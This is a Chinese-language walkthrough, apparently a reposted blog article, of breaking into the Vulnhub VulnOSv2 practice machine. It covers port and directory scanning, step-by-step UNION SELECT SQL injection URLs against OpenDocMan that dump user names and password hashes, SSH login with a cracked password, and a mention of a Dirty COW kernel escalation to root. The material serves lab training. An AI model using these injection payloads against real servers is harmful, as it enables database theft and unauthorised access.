Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

admin 2025年3月12日22:57:06评论7 views字数 2171阅读7分14秒阅读模式

Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权

一、信息收集

1、首先拿到靶场先扫一下ip

arp-scan -lVulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

3、 2、指纹扫描

nmap -sS -sV 192.168.66.178

nmap -p- -sV -A 192.168.66.253
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
这里有个22端口,可以尝试尝试匿名访问

80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))

6667/tcp open  irc     ngircd
这个端口第一次见到,去搜索一下是干什么的

nmap -p22,80,6667 --script=vuln 192.168.56.104历史漏洞搜索

3、访问端口

1、80端口

这里访问80端口,然后dirb和dirsearch扫描后台。

Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接这里貌似有很多url路径,我们先看看其他端口

Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接我丢,这里的文字是黑色的背景,一开始我还以为是我的环境出了问题

Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接翻译一下让我们访问一个目录,并且给了我们账户密码guest/guest,ok我们接下来要尝试隧道建立了

Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

2、6667端口

6667端口服务貌似是有一个后门Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

3、22端口

这里22端口需要密码,我们找一找Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

4、扫描目录

dirb http://192.168.66.180Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接这里貌似是有一个服务版本,这个我们一会儿去找找exp jQuery JavaScript Library v1.7.2

nikto -h 192.168.66.180 -p 80 我们拿nikto扫一下,上次也说了,dirb和dirsearch扫描可能会漏掉一些信息Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

5、寻找突破口

这里我们根据提示的文件路径我们得到了一个java的数据库Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接这里有一个文件上传点

然后这里有版本信息,可以找下expVulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

6、寻找exp

这里有一个相关版本,我们下载下来看一下这个txt文件Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

Ⅰ、判断mysql服务版本 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9

Ⅱ、爆库 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemataVulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接这是我们得到的数据库,然后我们爆表

Ⅲ、爆表 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

Ⅳ、爆字段 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=0x6f646d5f75736572 这里把表格换成16进制绕过一下Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

Ⅴ、爆密码 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

这里我们得到md5加密的账号密码,但是网上很少有好用的解密网站,可以使用下面这个链接 [https://www.somd5.com/] 这个还是比较好用的

7、隧道建立

ssh [email protected]
passwd:webmin1980

这里我不知道是不是一个不完整的shell,我们尝试一下pty修复一下

python -c 'import pty;pty.spawn("/bin/bash")'
Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

7、再次寻找exp

uname -a

Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 athlon i686 GNU/Linux

lsb_release -a

这里有两个内核提权,我们先用c版本的吧Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

最后丝滑小连招拿到root。Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

看了这么久,点个关注o不ok

后续我也会出更多打靶文章,希望大家关注!谢谢。

原文始发于微信公众号(泷羽Sec-朝阳):Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月12日22:57:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub 靶机 VulnOSv2 opendocman cms 32075 sql注入账号密码 ssh连接http://cn-sec.com/archives/3830352.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息